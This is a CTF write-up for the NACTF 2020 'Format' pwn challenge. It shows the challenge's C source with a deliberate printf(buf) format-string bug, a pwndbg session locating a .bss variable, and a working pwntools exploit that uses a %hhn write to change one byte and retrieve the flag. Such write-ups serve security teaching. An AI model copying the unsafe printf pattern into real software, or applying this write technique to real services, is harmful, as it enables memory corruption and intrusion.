NACTF 2020 - 'Format' writeup (pwn)
Note: All the related files that are mentioned in this post can be found here.
Categort: Pwn
The task:
A generic format string challenge, but requiring a bit of finesse. Can you pull it off?
nc challenges.ctfd.io 30266
We were given the source code of a binary running on challenges.ctfd.io:30266
:
#include <stdio.h>
#include <stdint.h>
uint64_t num;
void vuln() {
char buf[64];
puts("Give me some text.");
fgets(buf, sizeof(buf), stdin);
printf("You typed ");
printf(buf);
printf("!\n");
}
/* You don't need to understand how this works
*
* In case you're curious, this loads the pointer guard from the TCB. This
* value was chosen because it is randomized and can be accessed without
* following any pointer chains in this object's memory. */
#define LOAD_SECRET(x) \
__asm__ volatile ( \
"mov %%fs:0x30, %0;" \
: "=r" (x) \
)
void check_num() {
uint64_t goal;
LOAD_SECRET(goal);
__asm__ volatile (
"mov $0x42, %b0;"
: "+r" (goal)
);
if (num != goal) {
puts("Nope, try again");
} else {
puts("Congrats! here's your flag");
char flagbuf[64];
FILE* f = fopen("./flag.txt", "r");
fgets(flagbuf, sizeof(flagbuf), f);
fclose(f);
puts(flagbuf);
}
}
int main() {
setvbuf(stdout, NULL, _IONBF, 0);
LOAD_SECRET(num);
/* clear the low byte - that way there is no random chance of
* getting the flag without doing anything */
__asm__ volatile (
"mov $0, %b0;"
: "+r" (num)
);
vuln();
check_num();
return 0;
}
The program’s check_num
function will always fail and we’ll never get the flag unless we abuse the format string bug because:
- It takes a random number –> put it in
num
(using theLOAD_SECRET
macro) - Calling
check_num
, loading the secret again but comparing it with the result ofnum+0x42
(or,goal
in the source code) - Obviously
num
!==num+0x42
so the program fails
Inside check_num
, the if (num != goal)
statement determines whether we’re getting the flag or not.
After having a closer look at it in gdb, this is how it looks like:
0x0000000000401260 in check_num ()
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
[──────────────────────────────────────────────────────────────────────────────────────────REGISTERS──────────────────────────────────────────────────────────────────────────────────────────]
*RAX 0x5c278a023d35d342
RBX 0x0
RCX 0x7ffff7b042c0 (__write_nocancel+7) ◂— cmp rax, -0xfff
RDX 0x7ffff7dd3780 (_IO_stdfile_1_lock) ◂— 0x0
RDI 0x1
RSI 0x7ffff7dd26a3 (_IO_2_1_stdout_+131) ◂— 0xdd3780000000000a /* '\n' */
R8 0x7ffff7fe9700 ◂— 0x7ffff7fe9700
R9 0x12
R10 0x25b
R11 0x246
R12 0x4010e0 (_start) ◂— endbr64
R13 0x7fffffffe200 ◂— 0x1
R14 0x0
R15 0x0
RBP 0x4012f0 (__libc_csu_init) ◂— endbr64
RSP 0x7fffffffe0c0 ◂— 0x4141414141414141 ('AAAAAAAA')
*RIP 0x401260 (check_num+32) ◂— cmp qword ptr [rip + 0x2e19], rax
[───────────────────────────────────────────────────────────────────────────────────────────DISASM────────────────────────────────────────────────────────────────────────────────────────────]
0x401245 <check_num+5> mov rax, qword ptr fs:[0x28]
0x40124e <check_num+14> mov qword ptr [rsp + 0x48], rax
0x401253 <check_num+19> xor eax, eax
0x401255 <check_num+21> mov rax, qword ptr fs:[0x30]
0x40125e <check_num+30> mov al, 0x42
► 0x401260 <check_num+32> cmp qword ptr [rip + 0x2e19], rax <0x404080>
The values of num
and goal
+pwndbg> x ($rip + 0x2e19)
0x404080 <num>: 0x5c278a023d35d300
+pwndbg> p/x $rax
$3 = 0x5c278a023d35d342
As can be seen above, they are almost identical. The only difference is the last byte.
So, our goal here is to overwrite the least significant byte of num
(located in the .bss section)
+pwndbg> info symbol 0x404080
num in section .bss of /tmp/format
Solution
Shift the stack accordingly and use the hhn
format specifier to overwrite only the least significant byte of num
from pwn import *
r = remote('challenges.ctfd.io', 30266)
payload = b'%32x%33xQ' # padding to reach 0x42 bytes
payload += b'%8$hhn|' # writing to the 8th element on the stack (which is "num"'s address, below)
payload += p64(0x404080) # .bss <num>
r.sendlineafter('text', payload)
r.recvuntil('flag')
print(r.recv().decode('utf-8'))
Output:
nactf{d0nt_pr1ntf_u54r_1nput_HoUaRUxuGq2lVSHM}